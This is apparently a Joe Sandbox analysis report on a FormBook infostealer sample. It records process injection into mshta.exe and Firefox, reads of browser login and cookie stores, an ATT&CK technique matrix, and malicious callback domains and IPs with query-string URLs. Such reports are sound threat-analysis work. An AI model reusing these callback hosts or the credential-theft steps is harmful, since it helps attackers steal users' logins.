          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtQueryVolumeInformationFile: Direct from: 0x77462F2C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtReadVirtualMemory: Direct from: 0x77462E8C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtCreateKey: Direct from: 0x77462C6C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtSetInformationThread: Direct from: 0x77462B4C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtQueryAttributesFile: Direct from: 0x77462E6C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtDeviceIoControlFile: Direct from: 0x77462AEC
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtOpenSection: Direct from: 0x77462E0C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtCreateFile: Direct from: 0x77462FEC
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtOpenFile: Direct from: 0x77462DCC
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtQueryInformationToken: Direct from: 0x77462CAC
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtTerminateThread: Direct from: 0x77462FCC
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtAllocateVirtualMemory: Direct from: 0x77462BEC
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtOpenKeyEx: Direct from: 0x77462B9C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Section loaded: NULL target: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\wavjjT3sEq.exe Section loaded: NULL target: C:\Windows\SysWOW64\mshta.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mshta.exe Section loaded: NULL target: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe protection: read write
          Source: C:\Windows\SysWOW64\mshta.exe Section loaded: NULL target: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mshta.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
          Source: C:\Windows\SysWOW64\mshta.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mshta.exe Thread register set: target process: 5924
          Source: C:\Windows\SysWOW64\mshta.exe Thread APC queued: target process: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"
          Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: tIEQBQsFNUYr.exe, 00000002.00000002.3908739799.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000000.1520270657.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3913474021.00000000014C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: tIEQBQsFNUYr.exe, 00000002.00000002.3908739799.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000000.1520270657.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3913474021.00000000014C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: tIEQBQsFNUYr.exe, 00000002.00000002.3908739799.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000000.1520270657.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3913474021.00000000014C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: 0Program Manager
          Source: tIEQBQsFNUYr.exe, 00000002.00000002.3908739799.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000000.1520270657.0000000001620000.00000002.00000001.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3913474021.00000000014C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock

          Stealing of Sensitive Information

          Source: Yara match File source: 0.2.wavjjT3sEq.exe.120000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\mshta.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality

          Source: Yara match File source: 0.2.wavjjT3sEq.exe.120000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 312 Process Injection | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Abuse Elevation Control Mechanism | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 4 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          [Behavior graph: ID 1554612, Sample: wavjjT3sEq.exe, Startdate: 12/11/2024, Architecture: WINDOWS, Score: 100]

          Source | Detection | Scanner | Label | Link
          wavjjT3sEq.exe | 71% | ReversingLabs | Win32.Backdoor.FormBook |
          wavjjT3sEq.exe | 100% | Avira | TR/Crypt.ZPACK.Gen |
          wavjjT3sEq.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
                                                                                                              https://www.atom.com/pricingmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.atom.com/domain-name-generatormshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.atom.com/logosmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.strikingly.com/?utm_source=404&utm_medium=internal&utm_campaign=404_redirectfirefox.exe, 00000007.00000002.1912289226.0000000005864000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.atom.com/winnersmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://helpdesk.atom.com/squadhelp-services/trademark-filing-packagemshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.atom.com/managed-conteststIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.ecosia.org/newtab/mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.tmstore.click/qmcg/?mnYxMt=67IAuCDTBw5QZph6u0mJLa046OmMvBYKYaPJ7pOH3jPtJouGJ8FPmshta.exe, 00000003.00000002.3916202013.0000000004CC2000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.0000000003D42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://www.atom.com/assets/images/atom-favicon.pngmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.atom.com/testimonials-feedbackmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.amitayush.digital/5ab9/?mnYxMt=RKfYqv7dLSd52zuw9p6x496tTBAgi3kUigLPO7fV9fYs6caX5nN0t2Amzmshta.exe, 00000003.00000002.3916202013.000000000562E000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.00000000046AE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://ac.ecosia.org/autocomplete?q=mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.atom.com/premium-domains-for-sale/all/length/5%20Lettersmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.atom.com/audience-testingmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.atom.com/how-it-worksmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.atom.com/assets/imgs/domainwall.jpgmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.atom.com/brand-alignmentmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.atom.com/startupsmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.atom.com/youtube-name-generatormshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://iframe.mediadelivery.net/embed/239474/327efcdd-b1a2-4891-b274-974787ae8362?autoplay=false&ammshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.atom.com/start-contestmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.atom.com/branding-marketing-naming-contests/allmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.atom.com/our-workmshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
217.160.0.231 | www.coffee-and-blends.info | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
52.20.84.62 | www.luxe.guru | United States | 14618 | AMAZON-AESUS | true
35.156.117.131 | www.specialgift.asia.s.strikinglydns.com | United States | 16509 | AMAZON-02US | true
156.226.22.233 | www.nad5.shop | Seychelles | 132813 | AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK | true
142.250.185.179 | ghs.googlehosted.com | United States | 15169 | GOOGLEUS | false
206.119.82.134 | 40wxd.top | United States | 174 | COGENT-174US | true
54.179.173.60 | dns.ladipage.com | United States | 16509 | AMAZON-02US | false
162.213.249.216 | www.vasehub.xyz | United States | 22612 | NAMECHEAP-NETUS | true
3.33.130.190 | softillery.info | United States | 8987 | AMAZONEXPANSIONGB | true
172.81.61.224 | www.moritynomxd.xyz | United States | 22552 | ESITEDUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1554612
Start date and time: 2024-11-12 18:32:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: wavjjT3sEq.exe
renamed because original name is a hash value
Original Sample Name: 18623fe8fe11f35ef12ba7fd911a10b4f3b082e0a816849a6891cf2c9ece9f62.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/1@16/10
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 14
• Number of non-executed functions: 327
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: wavjjT3sEq.exe
Time | Type | Description
12:34:04 | API Interceptor | 9609099x Sleep call for process: mshta.exe modified
Process: C:\Windows\SysWOW64\mshta.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1209886597424439
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5: EFD26666EAE0E87B32082FF52F9F4C5E
SHA1: 603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256: 67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512: 28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious: false
Reputation: moderate, very likely benign file
                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Entropy (8bit):7.965631325753328
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.98%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                            File name:wavjjT3sEq.exe
                                                                                                                                                            File size:289'280 bytes
                                                                                                                                                            MD5:ea8d328ba326e4f6c37f0d853f981122
                                                                                                                                                            SHA1:6fdba2e03847634b20f105d0a3ff29348701c8c8
                                                                                                                                                            SHA256:18623fe8fe11f35ef12ba7fd911a10b4f3b082e0a816849a6891cf2c9ece9f62
                                                                                                                                                            SHA512:c0d6618eebe3bb6ae18c3531087c64e803c7f30ae620d0a30730ed8d015cae2158b3e27d637519f17d79baa345ce58de7401369c29f2379120ac1b03dc3362fe
                                                                                                                                                            SSDEEP:6144:pteV3JfK3fizH4v+81KxX008jZ10wEEnBYILn:r3GHG2rCRB
                                                                                                                                                            TLSH:C2542368734A18F3E69F5B75695B2AB588901A0F3FE5030A872E1523A3F42BC1F6CD45
                                                                                                                                                            File Content Preview:MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L...(..V.................X...................p....@................
                                                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                                                            Entrypoint:0x401480
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0x56B99B28 [Tue Feb 9 07:54:16 2016 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:6
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:6
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:
                                                                                                                                                            Instruction
                                                                                                                                                            push ebp
                                                                                                                                                            mov ebp, esp
                                                                                                                                                            sub esp, 00000420h
                                                                                                                                                            push ebx
                                                                                                                                                            push esi
                                                                                                                                                            push edi
                                                                                                                                                            push 00000400h
                                                                                                                                                            lea eax, dword ptr [ebp-0000041Ch]
                                                                                                                                                            push 00000000h
                                                                                                                                                            push eax
                                                                                                                                                            mov dword ptr [ebp-00000420h], 00000000h
                                                                                                                                                            call 00007F4650C32A4Ch
                                                                                                                                                            add esp, 0Ch
                                                                                                                                                            xor ebx, ebx
                                                                                                                                                            mov ecx, 00002A93h
                                                                                                                                                            mov dword ptr [ebp-14h], ebx
                                                                                                                                                            mov dword ptr [ebp-10h], ebx
                                                                                                                                                            mov dword ptr [ebp-1Ch], ebx
                                                                                                                                                            mov dword ptr [ebp-08h], 00005AC6h
                                                                                                                                                            mov dword ptr [ebp-0Ch], 00004C02h
                                                                                                                                                            mov dword ptr [ebp-04h], 00004A61h
                                                                                                                                                            mov dword ptr [ebp-18h], 00004F8Eh
                                                                                                                                                            jmp 00007F4650C30E48h
                                                                                                                                                            lea ebx, dword ptr [ebx+00000000h]
                                                                                                                                                            mov eax, 964FDA6Dh
                                                                                                                                                            imul ecx
                                                                                                                                                            add edx, ecx
                                                                                                                                                            sar edx, 06h
                                                                                                                                                            mov ecx, edx
                                                                                                                                                            shr ecx, 1Fh
                                                                                                                                                            add ecx, edx
                                                                                                                                                            jne 00007F4650C30E2Dh
                                                                                                                                                            mov ecx, 00004AACh
                                                                                                                                                            lea ebx, dword ptr [ebx+00000000h]
                                                                                                                                                            mov eax, 964FDA6Dh
                                                                                                                                                            imul ecx
                                                                                                                                                            add edx, ecx
                                                                                                                                                            sar edx, 07h
                                                                                                                                                            mov ecx, edx
                                                                                                                                                            shr ecx, 1Fh
                                                                                                                                                            add ecx, edx
                                                                                                                                                            jne 00007F4650C30E2Dh
                                                                                                                                                            call 00007F4650C32CCBh
                                                                                                                                                            mov dword ptr [ebp-000000C8h], eax
                                                                                                                                                            lea eax, dword ptr [ebp-44h]
                                                                                                                                                            push eax
                                                                                                                                                            push 0000056Bh
                                                                                                                                                            call 00007F4650C30A67h
                                                                                                                                                            lea eax, dword ptr [ebp-0000028Ch]
                                                                                                                                                            push eax
                                                                                                                                                            push 00002DE9h
                                                                                                                                                            call 00007F4650C30A56h
                                                                                                                                                            lea eax, dword ptr [ebp-0000028Ch]
                                                                                                                                                            push 00004D4Ch
                                                                                                                                                            Programming Language:
                                                                                                                                                            • [C++] VS2012 build 50727
                                                                                                                                                            • [ASM] VS2012 build 50727
                                                                                                                                                            • [LNK] VS2012 build 50727

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |


| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
